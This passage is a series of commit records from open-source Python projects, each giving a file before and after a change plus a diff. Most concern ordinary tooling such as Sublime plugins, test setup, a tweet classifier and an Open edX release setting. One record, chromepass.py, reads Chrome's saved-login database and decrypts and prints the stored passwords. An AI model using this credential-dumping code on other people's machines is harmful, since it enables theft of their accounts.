"key": "value",_
"key": "value"
}
This could of course be configured, but with the current simplicity of the package it would probably be overkill.
|
Python
|
mit
|
dzhibas/SublimePrettyJson
|
---
+++
@@ -18,6 +18,6 @@
try:
obj = json.loads(self.view.substr(selection))
- self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True)))
+ self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True), separators=(',', ': ')))
except Exception, e:
sublime.status_message(str(e))
|
fb67b85938d15cbb503bc0a0b0fde3bfb3436137
|
src/server.py
|
src/server.py
|
import argparse
import logging
import timeit
import cv2
from util import Action
from game import GameEnvironment
def main(args):
if args.debug_frames:
cv2.namedWindow('debug-frames')
prev_score = 0
game = GameEnvironment(args.agent)
while True:
start = timeit.default_timer()
frame, reward, terminal, lives = game.step(Action.IDLE)
print('frame=%s, reward=%d, terminal=%d, lives=%d' % (str(frame.shape), reward, terminal, lives))
if args.debug_frames:
cv2.imshow('debug-frames', frame)
cv2.waitKey(1)
duration = timeit.default_timer() - start
print('perceive-action cycle took %fs\n' % duration)
if args.debug_frames:
cv2.destroyWindow()
def get_parser():
parser = argparse.ArgumentParser(description='Server for nn-robot.')
parser.add_argument('--debug-frames', action='store_true', help='display each frame')
parser.add_argument('agent', help='name of the agent')
return parser
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(get_parser().parse_args())
|
import argparse
import logging
import timeit
import cv2
from util import Action
from game import GameEnvironment
def main(args):
if args.debug_frames:
cv2.namedWindow('debug-frames')
prev_score = 0
game = GameEnvironment(args.agent, host=args.host, port=args.port)
while True:
start = timeit.default_timer()
frame, reward, terminal, lives = game.step(Action.IDLE)
print('frame=%s, reward=%d, terminal=%d, lives=%d' % (str(frame.shape), reward, terminal, lives))
if args.debug_frames:
cv2.imshow('debug-frames', frame)
cv2.waitKey(1)
duration = timeit.default_timer() - start
print('perceive-action cycle took %fs\n' % duration)
if args.debug_frames:
cv2.destroyWindow()
def get_parser():
parser = argparse.ArgumentParser(description='Server for nn-robot.')
parser.add_argument('--debug-frames', action='store_true', help='display each frame')
parser.add_argument('--host', help='host of the robot, e.g. 192.168.1.2', type=str, default=None)
parser.add_argument('--port', help='port of the robot, e.g. 9090', type=int, default=9090)
parser.add_argument('agent', help='name of the agent')
return parser
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(get_parser().parse_args())
|
Add --host and --port flags
|
Add --host and --port flags
|
Python
|
mit
|
matthiasplappert/pibot
|
---
+++
@@ -13,7 +13,7 @@
cv2.namedWindow('debug-frames')
prev_score = 0
- game = GameEnvironment(args.agent)
+ game = GameEnvironment(args.agent, host=args.host, port=args.port)
while True:
start = timeit.default_timer()
frame, reward, terminal, lives = game.step(Action.IDLE)
@@ -33,6 +33,8 @@
def get_parser():
parser = argparse.ArgumentParser(description='Server for nn-robot.')
parser.add_argument('--debug-frames', action='store_true', help='display each frame')
+ parser.add_argument('--host', help='host of the robot, e.g. 192.168.1.2', type=str, default=None)
+ parser.add_argument('--port', help='port of the robot, e.g. 9090', type=int, default=9090)
parser.add_argument('agent', help='name of the agent')
return parser
|
cdb7dfd529f4078ab5995e38a8ae2f3b61c3fe98
|
tests/__init__.py
|
tests/__init__.py
|
# tests.__init__
import os
import os.path
import shutil
import tempfile
import yvs.shared as yvs
from mock import patch
temp_dir = tempfile.gettempdir()
local_data_dir_patcher = patch(
'yvs.shared.LOCAL_DATA_DIR_PATH',
os.path.join(temp_dir, 'yvs-data'))
local_cache_dir_patcher = patch(
'yvs.shared.LOCAL_CACHE_DIR_PATH',
os.path.join(temp_dir, 'yvs-cache'))
def set_up():
local_data_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
local_cache_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
def tear_down():
try:
shutil.rmtree(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
local_cache_dir_patcher.stop()
try:
shutil.rmtree(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
local_data_dir_patcher.stop()
|
# tests.__init__
import os
import os.path
import shutil
import tempfile
from mock import patch
import yvs.shared as yvs
temp_dir = tempfile.gettempdir()
local_data_dir_patcher = patch(
'yvs.shared.LOCAL_DATA_DIR_PATH',
os.path.join(temp_dir, 'yvs-data'))
local_cache_dir_patcher = patch(
'yvs.shared.LOCAL_CACHE_DIR_PATH',
os.path.join(temp_dir, 'yvs-cache'))
def set_up():
local_data_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
local_cache_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
def tear_down():
try:
shutil.rmtree(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
local_cache_dir_patcher.stop()
try:
shutil.rmtree(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
local_data_dir_patcher.stop()
|
Correct import order in tests init file
|
Correct import order in tests init file
|
Python
|
mit
|
caleb531/youversion-suggest,caleb531/youversion-suggest
|
---
+++
@@ -5,9 +5,9 @@
import shutil
import tempfile
-import yvs.shared as yvs
from mock import patch
+import yvs.shared as yvs
temp_dir = tempfile.gettempdir()
local_data_dir_patcher = patch(
|
f2dc9b260e6ca1fcf46b9f23fad5478ab7ff28f8
|
ce/expr/common.py
|
ce/expr/common.py
|
#!/usr/bin/env python
# vim: set fileencoding=UTF-8 :
from __future__ import print_function
ADD_OP = '+'
MULTIPLY_OP = '*'
OPERATORS = [ADD_OP, MULTIPLY_OP]
_cache_map = dict()
def cached(f):
def decorated(*args, **kwargs):
key = (f, tuple(args), tuple(kwargs.items()))
if key in _cache_map:
return _cache_map[key]
v = f(*args, **kwargs)
_cache_map[key] = v
return v
return decorated
|
#!/usr/bin/env python
# vim: set fileencoding=UTF-8 :
from __future__ import print_function
ADD_OP = '+'
MULTIPLY_OP = '*'
OPERATORS = [ADD_OP, MULTIPLY_OP]
def to_immutable(*m):
def r(d):
if isinstance(d, dict):
return tuple((e, to_immutable(v)) for e, v in d.iteritems())
if isinstance(d, (list, tuple)):
return tuple(to_immutable(e) for e in d)
return d
return tuple(r(e) for e in m)
_cache_map = dict()
def cached(f):
def decorated(*args, **kwargs):
key = to_immutable(f, args, kwargs.items())
if key in _cache_map:
return _cache_map[key]
v = f(*args, **kwargs)
_cache_map[key] = v
return v
return decorated
|
Fix dict argument not hashable
|
Fix dict argument not hashable
|
Python
|
mit
|
admk/soap
|
---
+++
@@ -11,12 +11,22 @@
OPERATORS = [ADD_OP, MULTIPLY_OP]
+def to_immutable(*m):
+ def r(d):
+ if isinstance(d, dict):
+ return tuple((e, to_immutable(v)) for e, v in d.iteritems())
+ if isinstance(d, (list, tuple)):
+ return tuple(to_immutable(e) for e in d)
+ return d
+ return tuple(r(e) for e in m)
+
+
_cache_map = dict()
def cached(f):
def decorated(*args, **kwargs):
- key = (f, tuple(args), tuple(kwargs.items()))
+ key = to_immutable(f, args, kwargs.items())
if key in _cache_map:
return _cache_map[key]
v = f(*args, **kwargs)
|
f256fc04361dc1a0e57c2a17d2216eadee03f987
|
test_pytnt.py
|
test_pytnt.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 30 20:22:29 2013
@author: chris
Test script for the pytnt project
"""
import unittest
from numpy.testing import assert_allclose
from processTNT import TNTfile
class TestLoadFile(unittest.TestCase):
"""Tests that pytnt can load files"""
def test_load_time_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1.tnt")
def test_load_freq_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1-ftp.tnt")
def test_load_fails(self):
with self.assertRaises(AssertionError):
zero = TNTfile("/dev/zero")
class TestFourierTransform(unittest.TestCase):
"""Test that the Fourier Transform is done correctly
Makes sure that the reference frequency is taken into account properly
"""
def test_ref1(self):
time_domain = TNTfile("testdata/LiCl_ref1.tnt")
freq_domain = TNTfile("testdata/LiCl_ref1-ftp.tnt")
lb = freq_domain.TMG2['linebrd'][0, 0]
my_ft = time_domain.LBfft(lb, 1)
assert_allclose(freq_domain.DATA, my_ft)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 30 20:22:29 2013
@author: chris
Test script for the pytnt project
"""
import unittest
import numpy as np
from numpy.testing import assert_allclose
from processTNT import TNTfile
class TestLoadFile(unittest.TestCase):
"""Tests that pytnt can load files"""
def test_load_time_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1.tnt")
def test_load_freq_domain(self):
ref1 = TNTfile("testdata/LiCl_ref1-ftp.tnt")
def test_load_fails(self):
with self.assertRaises(AssertionError):
zero = TNTfile("/dev/zero")
class TestFourierTransform(unittest.TestCase):
"""Test that the Fourier Transform is done correctly
Makes sure that the reference frequency is taken into account properly
"""
def test_ref1(self):
time_domain = TNTfile("testdata/LiCl_ref1.tnt")
freq_domain = TNTfile("testdata/LiCl_ref1-ftp.tnt")
lb = freq_domain.TMG2['linebrd'][0, 0]
ph0 = freq_domain.TMG2['cumm_0_phase'][0, 0]
my_ft = time_domain.LBfft(lb, 1, phase=np.deg2rad(ph0))
assert_allclose(freq_domain.DATA, my_ft)
if __name__ == '__main__':
unittest.main()
|
Use the phase from the pre-FT'd file for the test FT
|
Use the phase from the pre-FT'd file for the test FT
|
Python
|
bsd-3-clause
|
chatcannon/pytnt,chatcannon/pytnt
|
---
+++
@@ -9,6 +9,7 @@
import unittest
+import numpy as np
from numpy.testing import assert_allclose
from processTNT import TNTfile
@@ -41,8 +42,9 @@
freq_domain = TNTfile("testdata/LiCl_ref1-ftp.tnt")
lb = freq_domain.TMG2['linebrd'][0, 0]
+ ph0 = freq_domain.TMG2['cumm_0_phase'][0, 0]
- my_ft = time_domain.LBfft(lb, 1)
+ my_ft = time_domain.LBfft(lb, 1, phase=np.deg2rad(ph0))
assert_allclose(freq_domain.DATA, my_ft)
|
21df4ca35588993b00e610523f264be51e631b77
|
classifier/run.py
|
classifier/run.py
|
import time
from clean_tweet import TweetClassifier as TC
from gather_data import GatherData
def run_test(val, expected):
print "{0} (exp {1}) >> {2}".format(t.predict(val), expected, val)
# Start by gathering some data
g = GatherData()
g.gather_tweets()
g.write_tweets("train_data.txt")
time.sleep(3)
g.gather_tweets()
g.write_tweets("test_data.txt")
# train the classifier
t = TC("train_data.txt")
t.train()
# test the classifier
tested = 0
correct = 0
with open('test_data.txt', 'r') as f:
for line in f.readlines():
tested += 1
line = line[:-1]
if t.predict(line[:-1]) == int(line[-1]):
correct += 1
print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/tested)
|
import os
import shutil
import time
from clean_tweet import TweetClassifier as TC
from gather_data import GatherData
def run_test(val, expected):
print "{0} (exp {1}) >> {2}".format(t.predict(val), expected, val)
# Start by gathering some data.
g = GatherData()
# If we have an existing training set, this becomes the new test set (just for variety)
if os.path.isfile("train_data.txt"):
print "Old training data is the new test data..."
shutil.copyfile("train_data.txt", "test_data.txt")
else:
print "Gathering new test data"
g.gather_tweets()
g.write_tweets("test_data.txt")
time.sleep(3)
# gather new training data
print "Gathering training data..."
g.gather_tweets()
g.write_tweets("train_data.txt")
# train the classifier
print "Training the classifier..."
t = TC("train_data.txt")
t.train()
# test the classifier
print "Testing the classifier..."
tested = 0
correct = 0
with open('test_data.txt', 'r') as f:
for line in f.readlines():
tested += 1
line = line[:-1]
if t.predict(line[:-1]) == int(line[-1]):
correct += 1
print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/float(tested))
|
Copy over train to new test data
|
Copy over train to new test data
|
Python
|
mit
|
will-hart/twitter_sentiment,will-hart/twitter_sentiment
|
---
+++
@@ -1,3 +1,5 @@
+import os
+import shutil
import time
from clean_tweet import TweetClassifier as TC
@@ -7,20 +9,31 @@
def run_test(val, expected):
print "{0} (exp {1}) >> {2}".format(t.predict(val), expected, val)
-# Start by gathering some data
+# Start by gathering some data.
g = GatherData()
+
+# If we have an existing training set, this becomes the new test set (just for variety)
+if os.path.isfile("train_data.txt"):
+ print "Old training data is the new test data..."
+ shutil.copyfile("train_data.txt", "test_data.txt")
+else:
+ print "Gathering new test data"
+ g.gather_tweets()
+ g.write_tweets("test_data.txt")
+ time.sleep(3)
+
+# gather new training data
+print "Gathering training data..."
g.gather_tweets()
g.write_tweets("train_data.txt")
-time.sleep(3)
-g.gather_tweets()
-g.write_tweets("test_data.txt")
-
# train the classifier
+print "Training the classifier..."
t = TC("train_data.txt")
t.train()
# test the classifier
+print "Testing the classifier..."
tested = 0
correct = 0
@@ -31,4 +44,4 @@
if t.predict(line[:-1]) == int(line[-1]):
correct += 1
-print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/tested)
+print "Tested {0} tweets, got {1} correct ({2:.0%})".format(tested, correct, correct/float(tested))
|
773f78ae283a062818394743dea4535456ac9aeb
|
ckanext/qa/lib.py
|
ckanext/qa/lib.py
|
import json
import ckan.model as model
import ckan.plugins as p
def get_site_url(config):
return config.get('ckan.site_url_internally') or config['ckan.site_url']
def get_user_and_context(site_url):
user = p.toolkit.get_action('get_site_user')(
{'model': model, 'ignore_auth': True}, {}
)
context = json.dumps({
'site_url': site_url,
'apikey': user.get('apikey'),
'site_user_apikey': user.get('apikey'),
'username': user.get('name'),
})
return user, context
|
import json
import ckan.model as model
import ckan.plugins as p
def get_site_url(config):
return config.get('ckan.site_url_internally') or config['ckan.site_url']
def get_user_and_context(site_url):
user = p.toolkit.get_action('get_site_user')(
{'model': model, 'ignore_auth': True, 'defer_commit': True}, {}
)
context = json.dumps({
'site_url': site_url,
'apikey': user.get('apikey'),
'site_user_apikey': user.get('apikey'),
'username': user.get('name'),
})
return user, context
|
Fix for getting site_user the first time. (A commit herecauses problems during a db write notification. Spotted when harvesting)
|
[1268] Fix for getting site_user the first time. (A commit herecauses problems during a db write notification. Spotted when harvesting)
|
Python
|
mit
|
ckan/ckanext-qa,ckan/ckanext-qa,ckan/ckanext-qa
|
---
+++
@@ -8,7 +8,7 @@
def get_user_and_context(site_url):
user = p.toolkit.get_action('get_site_user')(
- {'model': model, 'ignore_auth': True}, {}
+ {'model': model, 'ignore_auth': True, 'defer_commit': True}, {}
)
context = json.dumps({
'site_url': site_url,
|
8f11df0dce9da94d197793bccd4a34e33e78b377
|
clean_packages.py
|
clean_packages.py
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import os
import requests
token = os.getenv("PACKAGECLOUD_TOKEN")
repository = "jollheef/henhouse"
api_url = "https://%s:@packagecloud.io/api/v1/repos/%s/" % (token, repository)
name = 'henhouse'
def delete_package(filename):
response = requests.delete(api_url+filename)
print("Delete package status: %d" % response.status_code)
packages = requests.get(api_url+"/packages.json").json()
for pkg in packages[:-9]:
if pkg['name'] == name:
delete_package(pkg['distro_version']+"/"+pkg['filename'])
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import os
import requests
token = os.getenv("PACKAGECLOUD_TOKEN")
repository = "jollheef/henhouse"
api_url = "https://%s:@packagecloud.io/api/v1/repos/%s/" % (token, repository)
name = 'henhouse'
def delete_package(filename):
response = requests.delete(api_url+filename)
print("Delete package status: %d" % response.status_code)
packages = requests.get(api_url+"/packages.json").json()
for pkg in packages[:-2]:
if pkg['name'] == name:
delete_package(pkg['distro_version']+"/"+pkg['filename'])
|
Save only 3 packages instead of 10
|
Save only 3 packages instead of 10
|
Python
|
agpl-3.0
|
jollheef/henhouse,jollheef/henhouse,jollheef/henhouse,jollheef/henhouse
|
---
+++
@@ -15,6 +15,6 @@
packages = requests.get(api_url+"/packages.json").json()
-for pkg in packages[:-9]:
+for pkg in packages[:-2]:
if pkg['name'] == name:
delete_package(pkg['distro_version']+"/"+pkg['filename'])
|
4ab06b1a8298656af5d0eee6587ff4ab63282901
|
nbrmd/__init__.py
|
nbrmd/__init__.py
|
"""R markdown notebook format for Jupyter
Use this module to read or write Jupyter notebooks as Rmd documents (methods 'read', 'reads', 'write', 'writes')
Use the 'pre_save_hook' method (see its documentation) to automatically dump your Jupyter notebooks as a Rmd file, in addition
to the ipynb file.
Use the 'nbrmd' conversion script to convert Jupyter notebooks from/to R markdown notebooks.
"""
from .nbrmd import read, reads, readf, write, writes, writef
from .hooks import update_rmd, update_ipynb, update_rmd_and_ipynb, update_selected_formats
try:
from .cm import RmdFileContentsManager
except ImportError as e:
RmdFileContentsManager = e.message
|
"""R markdown notebook format for Jupyter
Use this module to read or write Jupyter notebooks as Rmd documents (methods 'read', 'reads', 'write', 'writes')
Use the 'pre_save_hook' method (see its documentation) to automatically dump your Jupyter notebooks as a Rmd file, in addition
to the ipynb file.
Use the 'nbrmd' conversion script to convert Jupyter notebooks from/to R markdown notebooks.
"""
from .nbrmd import read, reads, readf, write, writes, writef
from .hooks import update_rmd, update_ipynb, update_rmd_and_ipynb, update_selected_formats
try:
from .cm import RmdFileContentsManager
except ImportError as e:
RmdFileContentsManager = str(e)
|
Save error message when cm not imported
|
Save error message when cm not imported
|
Python
|
mit
|
mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext,mwouts/jupytext
|
---
+++
@@ -13,4 +13,4 @@
try:
from .cm import RmdFileContentsManager
except ImportError as e:
- RmdFileContentsManager = e.message
+ RmdFileContentsManager = str(e)
|
85ca1534dc5d1f9b45cfec27d247f0932b2d7c52
|
plugin/build.py
|
plugin/build.py
|
# The source code is compiled into a Roblox Model right into the plugins folder.
#
# Simply run `python build.py` and everything will be taken care of. You can
# then load up any game and test out the plugin.
import os
import os.path
from elixir.compilers import ModelCompiler
local_app_data = os.environ["LocalAppData"]
plugins_folder = os.path.join(local_app_data, "Roblox/Plugins")
plugin = os.path.join(plugins_folder, "StudioBridge.rbxmx")
ModelCompiler("src/", plugin).compile()
|
# The source code is compiled into a Roblox Model right into the plugins folder.
#
# Simply run `python build.py` and everything will be taken care of. You can
# then load up any game and test out the plugin.
import os
import os.path
from elixir.compilers import ModelCompiler
local_app_data = os.environ["LocalAppData"]
plugins_folder = os.path.join(local_app_data, "Roblox/Plugins")
plugin = os.path.join(plugins_folder, "StudioBridge.rbxmx")
parent_dir = os.path.dirname(__file__)
ModelCompiler(os.path.join(parent_dir, "src/"), plugin).compile()
|
Allow the plugin to be compiled from anywhere
|
Allow the plugin to be compiled from anywhere
Because we were only using "src/" as the path, running build.py from anywhere but the 'plugin' would cause it to fail to locate the directory.
We're now using a path relative to the file, so it isn't dependant on where the file is called from.
|
Python
|
mit
|
vocksel/studio-bridge-cli
|
---
+++
@@ -12,4 +12,6 @@
plugins_folder = os.path.join(local_app_data, "Roblox/Plugins")
plugin = os.path.join(plugins_folder, "StudioBridge.rbxmx")
-ModelCompiler("src/", plugin).compile()
+parent_dir = os.path.dirname(__file__)
+
+ModelCompiler(os.path.join(parent_dir, "src/"), plugin).compile()
|
f44ac32bc9060cfa5ea6ce4284ce7f15b466be28
|
openedx/core/release.py
|
openedx/core/release.py
|
"""
Information about the release line of this Open edX code.
"""
# The release line: an Open edX release name ("ficus"), or "master".
# This should always be "master" on the master branch, and will be changed
# manually when we start release-line branches, like open-release/ficus.master.
RELEASE_LINE = "master"
def doc_version():
"""The readthedocs.org version name used in documentation references.
Returns a short string like "latest" or "open-release-ficus.master".
"""
if RELEASE_LINE == "master":
return "latest"
else:
return "open-release-{}.master".format(RELEASE_LINE)
|
"""
Information about the release line of this Open edX code.
"""
# The release line: an Open edX release name ("ficus"), or "master".
# This should always be "master" on the master branch, and will be changed
# manually when we start release-line branches, like open-release/ficus.master.
RELEASE_LINE = "hawthorn"
def doc_version():
"""The readthedocs.org version name used in documentation references.
Returns a short string like "latest" or "open-release-ficus.master".
"""
if RELEASE_LINE == "master":
return "latest"
else:
return "open-release-{}.master".format(RELEASE_LINE)
|
Set the RELEASE_LINE to hawthorn
|
Set the RELEASE_LINE to hawthorn
|
Python
|
agpl-3.0
|
appsembler/edx-platform,BehavioralInsightsTeam/edx-platform,appsembler/edx-platform,kmoocdev2/edx-platform,gymnasium/edx-platform,gsehub/edx-platform,gymnasium/edx-platform,Edraak/edraak-platform,Edraak/edraak-platform,BehavioralInsightsTeam/edx-platform,kmoocdev2/edx-platform,CredoReference/edx-platform,Edraak/edraak-platform,gsehub/edx-platform,kmoocdev2/edx-platform,CredoReference/edx-platform,CredoReference/edx-platform,Stanford-Online/edx-platform,Stanford-Online/edx-platform,appsembler/edx-platform,gsehub/edx-platform,kmoocdev2/edx-platform,Edraak/edraak-platform,BehavioralInsightsTeam/edx-platform,BehavioralInsightsTeam/edx-platform,Stanford-Online/edx-platform,gymnasium/edx-platform,appsembler/edx-platform,gsehub/edx-platform,kmoocdev2/edx-platform,gymnasium/edx-platform,Stanford-Online/edx-platform,CredoReference/edx-platform
|
---
+++
@@ -5,7 +5,7 @@
# The release line: an Open edX release name ("ficus"), or "master".
# This should always be "master" on the master branch, and will be changed
# manually when we start release-line branches, like open-release/ficus.master.
-RELEASE_LINE = "master"
+RELEASE_LINE = "hawthorn"
def doc_version():
|
cf336ac17ba194066517ab93ea7079415adba0c2
|
sum.py
|
sum.py
|
import sublime, sublime_plugin
class SumCommand(sublime_plugin.TextCommand):
def run(self, edit):
sum_view = self.view.window().new_file()
sum_view.set_name('Sum')
file_text = self.view.substr(sublime.Region(0, self.view.size()))
sum_view.insert(edit, 0, file_text)
sum_view.set_read_only(True)
sum_view.set_scratch(True)
|
import sublime, sublime_plugin
class SumCommand(sublime_plugin.TextCommand):
def run(self, edit):
sum_view = self.view.window().new_file()
sum_view.set_name('Sum')
file_text = self.view.substr(sublime.Region(0, self.view.size()))
numbers = []
for s in file_text.split():
if s.isdigit():
numbers.append(int(s))
else:
try:
numbers.append(float(s))
except ValueError:
pass
result = sum(numbers)
sum_view.insert(edit, 0, str(result))
sum_view.set_read_only(True)
sum_view.set_scratch(True)
|
Add up all ints (base 10) and floats in the file
|
Add up all ints (base 10) and floats in the file
|
Python
|
mit
|
jbrudvik/sublime-sum,jbrudvik/sublime-sum
|
---
+++
@@ -6,7 +6,19 @@
sum_view.set_name('Sum')
file_text = self.view.substr(sublime.Region(0, self.view.size()))
- sum_view.insert(edit, 0, file_text)
+
+ numbers = []
+ for s in file_text.split():
+ if s.isdigit():
+ numbers.append(int(s))
+ else:
+ try:
+ numbers.append(float(s))
+ except ValueError:
+ pass
+
+ result = sum(numbers)
+ sum_view.insert(edit, 0, str(result))
sum_view.set_read_only(True)
sum_view.set_scratch(True)
|
4f6ab3cf6effd2a7e05c56535c426f33e689f627
|
chromepass.py
|
chromepass.py
|
from os import getenv
import sqlite3
import win32crypt
appdata = getenv("APPDATA")
connection = sqlite3.connect(appdata + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print 'website_link ' + information[0]
print 'Username: ' + information[1]
print 'Password: ' + password
|
from os import getenv
import sqlite3
import win32crypt
appdata = getenv("APPDATA")
if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
appdata = appdata[:-8]
connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
#chrome encrypts the password with Windows WinCrypt.
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
print('website_link ' + information[0])
print('Username: ' + information[1])
print('Password: ' + str(password))
|
Make Python3 friendly. Add appdata check and fix.
|
Make Python3 friendly. Add appdata check and fix.
Confirmed working on Windows 7 Python 3.4 Installation Now :D
|
Python
|
mit
|
hassaanaliw/chromepass
|
---
+++
@@ -3,7 +3,9 @@
import win32crypt
appdata = getenv("APPDATA")
-connection = sqlite3.connect(appdata + "\..\Local\Google\Chrome\User Data\Default\Login Data")
+if appdata[-7:] == "Roaming": #Some WINDOWS Installations point to Roaming.
+ appdata = appdata[:-8]
+connection = sqlite3.connect(appdata + "\Local\Google\Chrome\\User Data\Default\Login Data")
cursor = connection.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for information in cursor.fetchall():
@@ -11,6 +13,6 @@
#Fortunately Decrypting it is no big issue.
password = win32crypt.CryptUnprotectData(information[2], None, None, None, 0)[1]
if password:
- print 'website_link ' + information[0]
- print 'Username: ' + information[1]
- print 'Password: ' + password
+ print('website_link ' + information[0])
+ print('Username: ' + information[1])
+ print('Password: ' + str(password))
|
89762635e5772376e191825aeb6f6b8d6f530792
|
markovsecrets/process/get_secret.py
|
markovsecrets/process/get_secret.py
|
import os
import json
from random import randrange, seed, sample
MAX_LEN = 50
def shift(s, new):
space = s.find(' ')
if space == -1:
raise Exception('bad shift string ' + s)
return s[space+1:] + ' ' + new
def main():
getw = lambda arr: sample(arr, 1)[0]
words = {}
starters = 0
wordlen = 1
seed()
with open('../data/mapping.json') as f:
words = json.load(f)
sparse = words.get('sparse').get('data')
dense = words.get('dense').get('data')
word = getw(sparse)
associated = sparse[word]
secret = word + ' ' + getw(associated)
word = secret
while wordlen < MAX_LEN:
associated = dense.get(word, [])
if len(associated) == 0:
break
tmp = getw(associated)
secret += ' ' + tmp
word = shift(word, tmp)
wordlen += 1
print secret
if __name__ == '__main__':
main()
|
import os
import json
from random import randrange, seed, sample
MAX_LEN = 75
def shift(s, new):
space = s.find(' ')
if space == -1:
raise Exception('bad shift string ' + s)
return s[space+1:] + ' ' + new
def main():
getw = lambda arr: sample(arr, 1)[0]
words = {}
starters = 0
wordlen = 1
seed()
with open('../data/mapping.json') as f:
words = json.load(f)
sparse = words.get('sparse').get('data')
dense = words.get('dense').get('data')
word = getw(sparse)
associated = sparse[word]
secret = word + ' ' + getw(associated)
word = secret
while wordlen < MAX_LEN:
associated = dense.get(word, [])
if len(associated) == 0:
break
tmp = getw(associated)
secret += ' ' + tmp
word = shift(word, tmp)
wordlen += 1
print secret
if __name__ == '__main__':
main()
|
Raise word limit by 50%
|
Raise word limit by 50%
|
Python
|
mit
|
oychang/Markovsecrets,oychang/Markovsecrets
|
---
+++
@@ -2,7 +2,7 @@
import json
from random import randrange, seed, sample
-MAX_LEN = 50
+MAX_LEN = 75
def shift(s, new):
|
fd85d735e1b4fafba470c91846faa23393cc26f7
|
simple_model/exceptions.py
|
simple_model/exceptions.py
|
class ValidationError(Exception):
pass
class EmptyField(ValidationError):
def __init__(self, field_name):
self.field_name = field_name
def __str__(self) -> str:
return '{} field cannot be empty'.format(self.field_name)
|
class ValidationError(Exception):
pass
class EmptyField(ValidationError):
def __init__(self, field_name):
self.field_name = field_name
def __str__(self) -> str:
return '{!r} field cannot be empty'.format(self.field_name)
|
Improve EmptyField exception string representation
|
Improve EmptyField exception string representation
|
Python
|
mit
|
lamenezes/simple-model
|
---
+++
@@ -7,4 +7,4 @@
self.field_name = field_name
def __str__(self) -> str:
- return '{} field cannot be empty'.format(self.field_name)
+ return '{!r} field cannot be empty'.format(self.field_name)
|
66ed7a95dff156ff8083ea9f0651a8b1d436c25e
|
kokki/cookbooks/busket/recipes/default.py
|
kokki/cookbooks/busket/recipes/default.py
|
import os
from kokki import *
Package("erlang")
# ubuntu's erlang is a bit messed up.. remove the man link
File("/usr/lib/erlang/man",
action = "delete")
# Package("mercurial",
# provider = "kokki.providers.package.easy_install.EasyInstallProvider")
command = os.path.join(env.config.busket.path, "bin", "busket")
Service("busket",
start_command = "%s start" % command,
stop_command = "%s stop" % command,
restart_command = "{0} start || {0} restart".format(command),
status_command = "%s ping" % command,
action = "nothing")
Script("install-busket",
not_if = lambda:os.path.exists(env.config.busket.path),
cwd = "/usr/local/src",
code = (
"git clone git://github.com/samuel/busket.git busket\n"
"cd busket\n"
"make release\n"
"mv rel/busket {install_path}\n"
).format(install_path=env.config.busket.path),
notifies = [("start", env.resources["Service"]["busket"])],
)
|
import os
from kokki import *
Package("erlang")
# ubuntu's erlang is a bit messed up.. remove the man link
File("/usr/lib/erlang/man",
action = "delete")
# Package("mercurial",
# provider = "kokki.providers.package.easy_install.EasyInstallProvider")
command = os.path.join(env.config.busket.path, "bin", "busket")
Service("busket",
start_command = "%s start" % command,
stop_command = "%s stop" % command,
restart_command = "{0} start || {0} restart".format(command),
status_command = "%s ping" % command,
action = "nothing")
Script("install-busket",
not_if = lambda:os.path.exists(env.config.busket.path),
cwd = "/usr/local/src",
code = (
"git clone git://github.com/samuel/busket.git busket\n"
"cd busket\n"
"mkdir /tmp/erlhome\n"
"export HOME=/tmp/erlhome\n"
"make release\n"
"mv rel/busket {install_path}\n"
).format(install_path=env.config.busket.path),
notifies = [("start", env.resources["Service"]["busket"])],
)
|
Make sure HOME is set when installing busket. Erlang requires it
|
Make sure HOME is set when installing busket. Erlang requires it
|
Python
|
bsd-3-clause
|
samuel/kokki
|
---
+++
@@ -25,6 +25,8 @@
code = (
"git clone git://github.com/samuel/busket.git busket\n"
"cd busket\n"
+ "mkdir /tmp/erlhome\n"
+ "export HOME=/tmp/erlhome\n"
"make release\n"
"mv rel/busket {install_path}\n"
).format(install_path=env.config.busket.path),
|
ad1b7cb8dda0dc2565aab6cd8c6a392753682875
|
wapiti/helpers.py
|
wapiti/helpers.py
|
# Copyright (c) Ecometrica. All rights reserved.
# Distributed under the BSD license. See LICENSE for details.
from collections import namedtuple
